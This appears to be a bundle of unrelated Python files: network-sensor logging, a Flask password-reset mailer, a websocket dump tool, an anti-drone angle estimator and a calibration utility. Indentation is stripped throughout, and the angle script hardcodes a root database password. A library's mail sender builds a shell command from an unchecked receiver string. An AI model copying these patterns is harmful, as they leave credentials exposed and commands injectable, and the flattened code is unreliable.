if config.LOG_SERVER.count(':') > 1:
remote_host, remote_port = config.LOG_SERVER.replace('[', '').replace(']', '').rsplit(':', 1)
# Reference: https://github.com/squeaky-pl/zenchmarks/blob/master/vendor/twisted/internet/tcp.py
_AI_NUMERICSERV = getattr(socket, "AI_NUMERICSERV", 0)
_NUMERIC_ONLY = socket.AI_NUMERICHOST | _AI_NUMERICSERV
_address = socket.getaddrinfo(remote_host, int(remote_port) if str(remote_port or "").isdigit() else 0, 0, 0, 0, _NUMERIC_ONLY)[0][4]
else:
remote_host, remote_port = config.LOG_SERVER.split(':')
_address = (remote_host, int(remote_port))
s = socket.socket(socket.AF_INET if len(_address) == 2 else socket.AF_INET6, socket.SOCK_DGRAM)
s.sendto(("%s %s" % (sec, event)).encode(UNICODE_ENCODING), _address)
if config.SYSLOG_SERVER:
extension = "src=%s spt=%s dst=%s dpt=%s trail=%s ref=%s" % (src_ip, src_port, dst_ip, dst_port, trail, reference)
_ = CEF_FORMAT.format(syslog_time=time.strftime("%b %d %H:%M:%S", time.localtime(int(sec))), host=HOSTNAME, device_vendor=NAME, device_product="sensor", device_version=VERSION, signature_id=time.strftime("%Y-%m-%d", time.localtime(os.path.getctime(config.TRAILS_FILE))), name=info, severity=0, extension=extension)
remote_host, remote_port = config.SYSLOG_SERVER.split(':')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(_.encode(UNICODE_ENCODING), (remote_host, int(remote_port)))
if (config.DISABLE_LOCAL_LOG_STORAGE and not any((config.LOG_SERVER, config.SYSLOG_SERVER))) or config.console:
sys.stderr.write(event)
sys.stderr.flush()
if config.plugin_functions:
for _ in config.plugin_functions:
_(event_tuple, packet)
except (OSError, IOError):
if config.SHOW_DEBUG:
traceback.print_exc()
def log_error(msg, single=False):
if single:
if msg in _single_messages:
return
else:
_single_messages.add(msg)
try:
handle = get_error_log_handle()
os.write(handle, ("%s %s\n" % (time.strftime(TIME_FORMAT, time.localtime()), msg)).encode(UNICODE_ENCODING))
except (OSError, IOError):
if config.SHOW_DEBUG:
traceback.print_exc()
def start_logd(address=None, port=None, join=False):
class ThreadingUDPServer(_socketserver.ThreadingMixIn, _socketserver.UDPServer):
pass
class UDPHandler(_socketserver.BaseRequestHandler):
def handle(self):
try:
data, _ = self.request
if data[0:1].isdigit(): # Note: regular format with timestamp in front
sec, event = data.split(b' ', 1)
else: # Note: naive format without timestamp in front
event_date = datetime.datetime.strptime(data[1:data.find(b'.')].decode(UNICODE_ENCODING), TIME_FORMAT)
sec = int(time.mktime(event_date.timetuple()))
event = data
if not event.endswith(b'\n'):
event = b"%s\n" % event
handle = get_event_log_handle(int(sec), reuse=False)
os.write(handle, event)
os.close(handle)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
# IPv6 support
if ':' in (address or ""):
address = address.strip("[]")
_socketserver.UDPServer.address_family = socket.AF_INET6
# Reference: https://github.com/squeaky-pl/zenchmarks/blob/master/vendor/twisted/internet/tcp.py
_AI_NUMERICSERV = getattr(socket, "AI_NUMERICSERV", 0)
_NUMERIC_ONLY = socket.AI_NUMERICHOST | _AI_NUMERICSERV
_address = socket.getaddrinfo(address, int(port) if str(port or "").isdigit() else 0, 0, 0, 0, _NUMERIC_ONLY)[0][4]
else:
_address = (address or '', int(port) if str(port or "").isdigit() else 0)
server = ThreadingUDPServer(_address, UDPHandler)
print("[i] running UDP server at '%s:%d'" % (server.server_address[0], server.server_address[1]))
if join:
server.serve_forever()
else:
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
def set_sigterm_handler():
def handler(signum, frame):
log_error("SIGTERM")
raise SystemExit
if hasattr(signal, "SIGTERM"):
signal.signal(signal.SIGTERM, handler)
if __name__ != "__main__":
set_sigterm_handler()
|
email.py | from flask_mail import Message
from app import app,mail
from flask import render_template
from threading import Thread
from flask_babel import _
# def send_mail(subject, sender, recipients, text_body, html_body):
# msg = Message(subject, sender=sender, recipients=recipients)
# msg.body = text_body
# msg.html = html_body
# mail.send(msg)
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_mail(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(app, msg)).start()
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_mail(
_('[Microblog] Reset Your Password'),
sender = app.config['ADMINS'][0],
recipients = [user.email],
text_body = render_template('email/reset_password.txt', user=user, token=token),
html_body = render_template('email/reset_password.html', user=user, token=token)
)
|
wsdump.py | #!/Users/mgallagher/copycatbot/bin/python
import argparse
import code
import sys
import threading
import time
import ssl
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = map(str.strip, args.headers.split(','))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if not args.verbose and opcode in OPCODE_DATA:
msg = data
elif args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
SelectAngle_Serial1121 - udp.py | # encoding=utf-8
import socket # 引入套接字
import threading # 引入并行
import pymysql
import struct
import serial
import matplotlib.pyplot as plt
import datetime
import math
import sys,os
sys.path.append(r'D:\OneDrive\Python_project\Github\AntiUAV_Python\Python')
# from DBInfo import *
plt.ion() # 开启一个画图的窗口
ax1 = [] # 定义一个 x 轴的空列表用来接收动态的数据
ax2 = []
ach1 = [] # 定义一个 y 轴的空列表用来接收动态的数据
ach2 = []
ach3 = []
ach4 = []
ach = []
count_time = 0
Last_rawdata = 0
Process_data = 0
ch1_db_data = []
ch2_db_data = []
ch3_db_data = []
ch4_db_data = []
matched_angle_buff=[]
matched_angle=0
matched_angle_mid=0
udp_socket= socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
angle_db_data=[]
'''
##
@brief:定标函数
@param:
ch1_raw_data:通道一数据
ch2_raw_data:通道二数据
ch3_raw_data:通道三数据
ch4_raw_data:通道四数据
@retval:
查表得到的角度值
##
'''
def Print4(counnt, ch1_data, ch2_data, ch3_data, ch4_data, angle):
data = datetime.date.today()
plt.figure("4 Channel&Matched Angle" + str(data))
ax2.append(counnt) # 添加 i 到 x 轴的数据中
ach1.append(ch1_data)
ach2.append(ch2_data)
ach3.append(ch3_data)
ach4.append(ch4_data)
ach.append(angle)
plt.clf() # 清除之前画的图
plt.subplot(2, 1, 1)
plt.plot(ax2, ach1, label="CH1") # 画出当前 ax 列表和 ay 列表中的值的图形
plt.plot(ax2, ach2, label="CH2")
plt.plot(ax2, ach3, label="CH3")
plt.plot(ax2, ach4, label="CH4")
plt.title('Channel Data')
plt.xlabel("Time")
plt.ylabel("Normalized Amplitude")
plt.grid(True)
plt.subplot(2, 1, 2)
plt.plot(ax2, ach, label="Matched Angle")
plt.title('Angle')
plt.xlabel("Time")
plt.ylabel("Angle")
plt.grid(True)
plt.pause(0.08) # 暂停一秒
# plt.ioff() # 关闭画图的窗口
def DataProcess(count, angle_now, angle_last):
if count == 0:
return angle_now
else:
if abs(angle_now - angle_last) >= 20:
# print("平均")
# result = (angle1 + angle2) / 2
if angle_now - angle_last > 0:
return angle_last + 10
if angle_now - angle_last < 0:
return angle_last - 10
else:
return angle_now
def Print1(counnt, ch_data):
ax1.append(counnt) # 添加 i 到 x 轴的数据中
ach.append(ch_data)
plt.clf() # 清除之前画的图
plt.subplot(2, 1, 1)
plt.plot(ax1, ach1) # 画出当前 ax 列表和 ay 列表中的值的图形
plt.pause(0.1)
def SelectData():
global ch1_db_data
global ch2_db_data
global ch3_db_data
global ch4_db_data
global angle_db_data
try:
conn = pymysql.connect(host=DB_IPAddr, port=3306, db=DB_Name, user='root', passwd="123456",
charset='utf8')
cs1 = conn.cursor()
cs1.execute("select ch1 from final_table")
result1 = cs1.fetchall()
cs1.execute("select ch2 from final_table")
result2 = cs1.fetchall()
cs1.execute("select ch3 from final_table")
result3 = cs1.fetchall()
cs1.execute("select ch4 from final_table")
result4 = cs1.fetchall()
cs1.execute("select angle from final_table")
result5 = cs1.fetchall()
# print(result1)
# print(result2)
# print(result3)
# print(result4)
for i in range(len(result5) ):
ch1_db_data.append(float((result1[i])[0]))
ch2_db_data.append(float((result2[i])[0]))
ch3_db_data.append(float((result3[i])[0]))
ch4_db_data.append(float((result4[i])[0]))
angle_db_data.append(float((result5[i])[0]))
# print(result1[0])
conn.commit()
cs1.close()
conn.close()
except Exception as e:
print(e)
pass
def SelectAngle(ch1_raw_data, ch2_raw_data, ch3_raw_data, ch4_raw_data):
# print("Raw_CH1_data:%.15f\nRaw_CH2_data:%.15f\nRaw_CH3_data:%.15f\nRaw_CH4_data:%.15f" % (
# ch1_raw_data, ch2_raw_data, ch3_raw_data, ch4_raw_data))
global ch1_db_data
global ch2_db_data
global ch3_db_data
global ch4_db_data
# 归一化
min_ch_data = min(ch1_raw_data, ch2_raw_data, ch3_raw_data, ch4_raw_data)
min_ch_data = float(min_ch_data)
ch1_data = float(ch1_raw_data) / min_ch_data
ch2_data = float(ch2_raw_data) / min_ch_data
ch3_data = float(ch3_raw_data) / min_ch_data
ch4_data = float(ch4_raw_data) / min_ch_data
if ch1_data + ch2_data + ch3_data + ch4_data <= 4:
print("数据可能有误!\n数据可能有误!\n数据可能有误!\n数据可能有误!\n数据可能有误!")
ch1_data = float(ch1_data)
ch2_data = float(ch2_data)
ch3_data = float(ch3_data)
ch4_data = float(ch4_data)
sum_difference = []
for i in range(len(angle_db_data)):
ch1ch2_difference = (20 * math.log((ch1_db_data[i] / ch2_db_data[i]), 10) - 20 * math.log((ch1_data / ch2_data),
10)) ** 2 # 差值放大
ch2ch3_difference = (20 * math.log((ch2_db_data[i] / ch3_db_data[i]), 10) - 20 * math.log((ch2_data / ch3_data),
10)) ** 2 # 差值放大
ch3ch4_difference = (20 * math.log((ch3_db_data[i] / ch4_db_data[i]), 10) - 20 * math.log((ch3_data / ch4_data),
10)) ** 2 # 差值放大
sum_difference.append(ch1ch2_difference + ch2ch3_difference + ch3ch4_difference)
# print(sum_difference)
# print(min(sum_difference))
# print(sum_difference.index(min(sum_difference)))
# return sum_difference.index(min(sum_difference))
global count_time
global Last_rawdata
global Process_data
Last_rawdata = Process_data
Process_data = sum_difference.index(min(sum_difference))
Process_data=angle_db_data[Process_data]
result = DataProcess(count_time, Process_data, Last_rawdata)
count_time += 1
return result
def udp_send(udp_socket, BetaAngle):
mhesIPAddr = '192.168.3.70' # 民航二所IP
mhesPort = 10002
# 民航二所Port
# send_data = input('请输入要发送的数据:')
send_data_head = 0xb3b3
send_data_headlen = 34
send_data_latitude = 103+(45/60)/100+(20/3600)/10000
send_data_longitude = 31+(7/60)/100+(2/3600)/10000
send_data_height = 790
send_data_tarqua = 1
send_data_end = 0xb1af
send_data_tracknum = 1
send_data_trackdis = 0
send_data_bata = BetaAngle
send_data_alpha = 0
send_data_trackrate = 0
send_data = struct.pack('<HHdddIHiffff', send_data_head, send_data_headlen, send_data_latitude,
send_data_longitude, send_data_height, send_data_tarqua, send_data_end,
send_data_tracknum, send_data_trackdis, send_data_bata, send_data_alpha,
send_data_trackrate)
print(len(send_data))
# input('enter')
# send_data = send_data.encode('utf-8') #这行代码需要测试 一达测试版本中没有这一行
udp_socket.sendto(send_data, (mhesIPAddr, mhesPort)) # sendto(发送数据,发送地址)
# udp_socket.close()
def udp_recv(udp_socket):
send_data = '1'
send_data = send_data.encode('utf-8')
udp_socket.sendto(send_data, ('192.168.3.10', 7))
# 问题描述:套接字必须发送一次才能接收
count = 0
while True:
# for i in range(1000):
receive_message, client = udp_socket.recvfrom(4096)
# print(receive_message)
data = struct.unpack('<4q', receive_message) # 调用struct库解包,>4q代表4个long long 大端对齐<4q代表4个long long 小端对齐
warning = "板子是小端,网络调试助手是大端!!!"
# for i in range(len(data)): # 循环打印data结构体的值
# print(data[i])
count = count + 1
print("Raw_CH1_data:%.15f\nRaw_CH2_data:%.15f\nRaw_CH3_data:%.15f\nRaw_CH4_data:%.15f" % (
data[0], data[1], data[2], data[3]))
matched_angle = SelectAngle(data[0], data[1], data[2], data[3])
Print4(count, data[0], data[1], data[2], data[3], matched_angle)
# Print1(count,SelectAngle(data[0], data[1], data[2], data[3]))
print("当前角度为: %d°" % matched_angle)
print("\n\n")
def main():
GetInfo()
SelectData()
a = input("Press any key to start.")
print("等待接收数据")
global udp_socket
global matched_angle
PC_IPAddr = get_host_ip()
PC_Port = 8080
udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # 创建套接字
udp_socket.bind((PC_IPAddr, PC_Port)) # 服务器绑定ip和端口
# 接收数据
# t = threading.Thread(target=udp_recv, args=(udp_socket,))
t = threading.Thread(target=USB_recv)
# 发送数据
# t1 = threading.Thread(target=udp_send, args=(udp_socket,)) # Thread函数用于并行
# t1.start() # 发送并行开始
t.start()
def get_host_ip():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))
ip = s.getsockname()[0]
finally:
s.close()
return ip
def USB_recv():
ser = serial.Serial("COM5", 115200)
ser.close()
ser.open()
num = 66
count = 0
global matched_angle_buff
global matched_angle_mid
while True:
# 解析数据
USB_recv_data = ((ser.read(num)).decode('ASCII')).replace("\r\n", "")
USB_recv_data = bytes(USB_recv_data, encoding="utf8")
data = []
data.append(int(("0x" + (USB_recv_data[0: 16].decode())), 16))
data.append(int(("0x" + (USB_recv_data[16: 32].decode())), 16))
data.append(int(("0x" + (USB_recv_data[32: 48].decode())), 16))
data.append(int(("0x" + (USB_recv_data[48: 64].decode())), 16))
count = count + 1
# 动态画图
print("Raw_CH1_data:%.15f\nRaw_CH2_data:%.15f\nRaw_CH3_data:%.15f\nRaw_CH4_data:%.15f" % (
data[0], data[1], data[2], data[3]))
matched_angle = SelectAngle(data[0], data[1], data[2], data[3])
matched_angle_buff.append(matched_angle)
if len(matched_angle_buff)>=5:
# matched_angle_mid=matched_angle_buff[0]+matched_angle_buff[1]+matched_angle_buff[2]
# matched_angle_mid=matched_angle_mid/3
matched_angle_mid=sum(matched_angle_buff)/(len(matched_angle_buff)*1.0)#求平均,平滑数据
matched_angle_buff=[]
udp_send(udp_socket, matched_angle_mid)
Print4(count, data[0], data[1], data[2], data[3], matched_angle_mid)
# Print1(count,SelectAngle(data[0], data[1], data[2], data[3]))
print("\033[31m当前角度为:{} \033[0m".format(matched_angle))
print("\n\n")
ser.close()
def GetInfo():
global DB_IPAddr
global DB_Name
global distance
global NowTime
global PC_IPAddr
global PC_Port
global TableName
DB_IPAddr = input("请输入数据库IP地址(默认192.168.3.2):192.168.")
if DB_IPAddr == "":
DB_IPAddr = "192.168.3.2"
print("192.168.3.2")
else:
DB_IPAddr = "192.168." + DB_IPAddr
print(DB_IPAddr)
pass
DB_Name = input("请输入数据库名(默认uav_data):")
if DB_Name == "":
DB_Name = "uav_data"
print(DB_Name)
else:
print(DB_Name)
pass
# while True:
# distance = input("距离:")
# if distance != "":
# break
# else:
# print("\033[31m请输入距离!\033[0m")
# NowTime = datetime.datetime.now().strftime('%Y%m%d%H%M')
# PC_IPAddr = get_host_ip()
# PC_Port = 8080
# TableName = "m" + distance + "d" + NowTime
if __name__ == '__main__':
main()
|
TargetExtractor.py | import sm
import numpy as np
import sys
import multiprocessing
import queue
import time
import copy
import cv2
def multicoreExtractionWrapper(detector, taskq, resultq, clearImages, noTransformation):
while 1:
try:
task = taskq.get_nowait()
except queue.Empty:
return
idx = task[0]
stamp = task[1]
image = task[2]
if noTransformation:
success, obs = detector.findTargetNoTransformation(stamp, np.array(image))
else:
success, obs = detector.findTarget(stamp, np.array(image))
if clearImages:
obs.clearImage()
if success:
resultq.put( (obs, idx) )
def extractCornersFromDataset(dataset, detector, multithreading=False, numProcesses=None, clearImages=True, noTransformation=False):
print("Extracting calibration target corners")
targetObservations = []
numImages = dataset.numImages()
# prepare progess bar
iProgress = sm.Progress2(numImages)
iProgress.sample()
if multithreading:
if not numProcesses:
numProcesses = max(1,multiprocessing.cpu_count()-1)
try:
manager = multiprocessing.Manager()
resultq = manager.Queue()
manager2 = multiprocessing.Manager()
taskq = manager2.Queue()
for idx, (timestamp, image) in enumerate(dataset.readDataset()):
taskq.put( (idx, timestamp, image) )
plist=list()
for pidx in range(0, numProcesses):
detector_copy = copy.copy(detector)
p = multiprocessing.Process(target=multicoreExtractionWrapper, args=(detector_copy, taskq, resultq, clearImages, noTransformation, ))
p.start()
plist.append(p)
#wait for results
last_done=0
while 1:
if all([not p.is_alive() for p in plist]):
time.sleep(0.1)
break
done = numImages-taskq.qsize()
sys.stdout.flush()
if (done-last_done) > 0:
iProgress.sample(done-last_done)
last_done = done
time.sleep(0.5)
resultq.put('STOP')
except Exception as e:
raise RuntimeError("Exception during multithreaded extraction: {0}".format(e))
#get result sorted by time (=idx)
if resultq.qsize() > 1:
targetObservations = [[]]*(resultq.qsize()-1)
for lidx, data in enumerate(iter(resultq.get, 'STOP')):
obs=data[0]; time_idx = data[1]
targetObservations[lidx] = (time_idx, obs)
targetObservations = list(zip(*sorted(targetObservations, key=lambda tup: tup[0])))[1]
else:
targetObservations=[]
#single threaded implementation
else:
for timestamp, image in dataset.readDataset():
if noTransformation:
success, observation = detector.findTargetNoTransformation(timestamp, np.array(image))
else:
success, observation = detector.findTarget(timestamp, np.array(image))
if clearImages:
observation.clearImage()
if success == 1:
targetObservations.append(observation)
iProgress.sample()
if len(targetObservations) == 0:
print("\r")
sm.logFatal("No corners could be extracted for camera {0}! Check the calibration target configuration and dataset.".format(dataset.topic))
else:
print("\r Extracted corners for %d images (of %d images) " % (len(targetObservations), numImages))
#close all opencv windows that might be open
cv2.destroyAllWindows()
return targetObservations
|
pydev.py | #! /bin/env python
# encoding=utf-8
# gusimiu@baidu.com
# datemark: 20150428
#
# V1.6:
# add TempStorage.
#
# V1.5:
# add png_to_array
#
# V1.4:
# add zip_channel, index_to_one_hot
#
# V1.3:
# add DimAnalysis
#
# V1.2:
# add FileProgress
#
# V1.1:
# add MailSender and Arg
#
# V1.0.6 change::
# add xfind
# xfind: set operation. treat file as set.
#
# V1.0.5 change::
# add VarConf and RandomItemGenerator
#
# V1.0.4 change::
# add topkheap from zhangduo@
#
# V1.0.3 change::
# add Timer.
#
# V1.0.2 change::
# add Mapper mode. (--mapper)
#
# V1.0.1 change::
# dump(self, stream, sort)
#
# V1.0
# complete code.
#
import os
import re
import logging
import traceback
import socket
import sys
import time
from multiprocessing import *
import heapq
import itertools
import random
import ConfigParser
import argparse
import json
import cPickle as cp
#import threading
HEADER_LENGTH = 8
DETECTIVE_MSG = 'Are_you_alive?'
##############################################################################
# Part I: pydev library implemention.
#
##############################################################################
class ColorString:
TC_NONE ="\033[m"
TC_RED ="\033[0;32;31m"
TC_LIGHT_RED ="\033[1;31m"
TC_GREEN ="\033[0;32;32m"
TC_LIGHT_GREEN ="\033[1;32m"
TC_BLUE ="\033[0;32;34m"
TC_LIGHT_BLUE ="\033[1;34m"
TC_DARY_GRAY ="\033[1;30m"
TC_CYAN ="\033[0;36m"
TC_LIGHT_CYAN ="\033[1;36m"
TC_PURPLE ="\033[0;35m"
TC_LIGHT_PURPLE ="\033[1;35m"
TC_BROWN ="\033[0;33m"
TC_YELLOW ="\033[1;33m"
TC_LIGHT_GRAY ="\033[0;37m"
TC_WHITE ="\033[1;37m"
def __init__(self):
pass
@staticmethod
def colors(s, color):
return color + s + ColorString.TC_NONE
@staticmethod
def red(s): return ColorString.colors(s, ColorString.TC_RED)
@staticmethod
def yellow(s): return ColorString.colors(s, ColorString.TC_YELLOW)
@staticmethod
def green(s): return ColorString.colors(s, ColorString.TC_GREEN)
@staticmethod
def blue(s): return ColorString.colors(s, ColorString.TC_BLUE)
@staticmethod
def cyan(s): return ColorString.colors(s, ColorString.TC_CYAN)
class TempStorage:
'''
Temperory store the program data.
Usage:
ts = TempStorage(sign='# your sign for each run.', filename=filename)
if ts.has_data():
# load data from ts.
m = ts.read()
n = ts.read()
...
else:
# do initialize calculation.
...
# then serialize to ts.
ts.write(m)
ts.write(n)
...
'''
def __init__(self, sign, filename):
# try to catch data.
self.__has_data = False
self.__sign = sign
try:
self.__fd = open(filename, 'r')
filesign = self.read()
if filesign == sign:
# okay, matched.
print >> sys.stderr, 'Data is in tempStorage.'
self.__has_data = True
return
else:
print >> sys.stderr, 'File exists, but not match sign:[%s]!=[%s]' % (filesign, sign)
except:
print >> sys.stderr, 'Data is not ready [%s] for sign [%s]' % (filename, sign)
self.__has_data = False
self.__fd = open(filename, 'w')
self.write(self.__sign)
def has_data(self):
return self.__has_data
def write(self, obj):
return cp.dump(obj, self.__fd)
def read(self):
return cp.load(self.__fd)
class StringTable:
def __init__(self, col, sep_col='\t', sep_row='\n', makeup=True):
self.__column_num = col
self.set_seperator(sep_col, sep_row)
self.__makeup = makeup
self.__data = []
def set_seperator(self, sep_col, sep_row):
self.__sep_column = sep_col
self.__sep_row = sep_row
def append(self, item):
self.__data.append(str(item))
def set(self, data):
self.__data = map(lambda x:str(x), data)
def __str__(self):
out = ''
rid = 0
cid = 0
for i, item in enumerate(self.__data):
out += item
cid += 1
if cid % self.__column_num == 0:
out += self.__sep_row
else:
out += self.__sep_column
if self.__makeup:
rest_col = self.__column_num - ((len(self.__data)-1) % self.__column_num + 1)
for i in range(rest_col):
out += self.__sep_column
return out
class SplitFileWriter:
def __init__(self, filename_prefix, records_each_file=50000, header=None):
self.__cur_id = 0
self.__rec_num = 0
self.__rec_each_file = records_each_file
self.__filename_prefix = filename_prefix
self.__header = header
self.__fd = None
self.__open_next()
def write(self, line):
print >> self.__fd, line
self.__rec_num += 1
if self.__rec_num >= self.__rec_each_file:
self.__open_next()
def __open_next(self):
self.__fd = file('%s.%d' % (self.__filename_prefix, self.__cur_id), 'w')
if self.__header:
print >> self.__fd, self.__header
self.__rec_num = 0
self.__cur_id += 1
class DimInfo:
def __init__(self, name=None):
self.name = name
self.distribution = {}
def set(self, typename, ratio, score):
self.distribution[typename] = [ratio, score]
def uniform_ratio(self):
sum = 0
for key, (ratio, score) in self.distribution.iteritems():
sum += ratio
if sum>0:
for key in self.distribution:
self.distribution[key][0] = self.distribution[key][0] * 1.0 / sum
def write(self, stream):
print >> stream, '%s\t%s\n' % (json.dumps(self.name), json.dumps(self.distribution))
def read(self, stream):
line = stream.readline()
key, value = line.split('\t')
self.name = json.loads(key)
self.distribution = json.loads(value)
def score(self):
self.uniform_ratio()
ret = 0
for (ratio, score) in self.distribution.values():
ret += ratio * score
return ret
def compare(self, A):
''' analysis what makes diff from A to B.
'''
final_score_A = A.score()
final_score_B = self.score()
print >> sys.stderr, 'score of A: %8.3f' % (final_score_A)
print >> sys.stderr, 'score of B: %8.3f' % (final_score_B)
print >> sys.stderr, ' diff: %8.3f' % (final_score_B - final_score_A)
print >> sys.stderr, '-------------------------------------------'
# analysis distribution diff.
# assume the distribution is not change from A to B.
# then the delta = score_B - score_disA (score is same.)
distribution_score = 0
score_score = 0
top_diff = []
for key, (ratio_B, score_B) in self.distribution.iteritems():
ratio_A, score_A = A.distribution.get(key, (0, 0))
distribution_score += ratio_A * score_B
score_score += ratio_B * score_A
diff_score = score_B * ratio_B - score_A * ratio_A
top_diff.append( (key, diff_score, 'B:%.1f%% x %.2f => A:%.1f%% x %.2f' %
(ratio_B*100., score_B, ratio_A*100., score_A )) )
for key, (ratio_A, score_A) in A.distribution.iteritems():
if key in self.distribution:
continue
top_diff.append( (key, -score_A*ratio_A, 'B:%.1f%% x %.2f => A:%.1f%% x %.2f' %
(0, 0, ratio_A*100., score_A )) )
delta_distribution = final_score_B - distribution_score
delta_score = final_score_B - score_score
print >> sys.stderr, 'Diff by distribution : %8.3f (%.3f->%.3f)' % (
delta_distribution, final_score_B, distribution_score)
print >> sys.stderr, 'Diff by score : %8.3f (%.3f->%.3f)' % (
delta_score, final_score_B, score_score)
print >> sys.stderr, '-------------------------------------------'
for key, diff, info in sorted(top_diff, key=lambda x:-abs(x[1]))[:5]:
print >> sys.stderr, '%30s\t%8.3f' % (key, diff)
print >> sys.stderr, '%30s\t : %s' % ('', info)
def debug(self, stream):
print >> stream, '----------------[[ %s ]]----------------' % self.name
for key, (ratio, score) in sorted(self.distribution.iteritems(), key=lambda x:-x[1][0]):
print >> stream, '%30s\t%8.3f\t%5.1f%%' % (key, score, ratio*100.)
class ProgressBar:
def __init__(self):
self.__name = None
self.__percentage = 0.0
self.__vol = 0.0
self.__total = 100.0
def __progress_info(self):
return '[%s] [%s>%s] [ %3.3f%% ]' % (
self.__name,
'='*int(self.__percentage),
' '*(99-int(self.__percentage)),
self.__percentage
)
def start(self, name, total=100.0, stream=sys.stderr):
self.__name = name
self.__percentage = 0
self.__vol = 0.0
self.__total = total
self.__stream = stream
self.__stream.write(self.__progress_info())
def inc(self, vol):
self.__vol += vol
self.__percentage = 100.0 * self.__vol / self.__total
self.__stream.write('%c%s' % (13, self.__progress_info()))
if self.__vol >= self.__total:
self.__stream.write('\n')
class FileProgress:
def __init__(self, fd, name=None):
self.__fd = fd
self.__name = name
self.__last_reported = 0
cur_pos = fd.tell()
fd.seek(0, 2)
self.__size = fd.tell()
fd.seek(cur_pos, 0)
print >> sys.stderr, 'FileProgress: File size reported: %d' % self.__size
def check_progress(self, report_interval=0.0005):
if self.__size <= 0:
print >> sys.stderr, 'FileProgress: file is stream? I cannot report for stream file.'
return 0
cur = 1. * self.__fd.tell() / self.__size
if cur - self.__last_reported>report_interval:
temp_c = (int(cur*100) +3) / 4;
sys.stderr.write('%cFileProgress: process |%s>%s| [%s] of %.3f%% (%d/%d)' % (
13, '='*temp_c, ' '*(25-temp_c), self.__name, cur*100., self.__fd.tell(), self.__size))
self.__last_reported = cur
return cur
def end_progress(self):
print >> sys.stderr, '\nProgress [%s] is over.' % (self.__name)
class MailSender:
def __init__(self, sendmail='/usr/sbin/sendmail'):
self.__cmd = sendmail
def send(self, receiver, title, cont, sender='pydev.MailSender@nickgu.github.com'):
#p = os.popen('cat', 'w')
p = os.popen(self.__cmd + ' %s'%receiver, 'w')
print >> p, 'From: pydev.MailSender<%s>' % sender
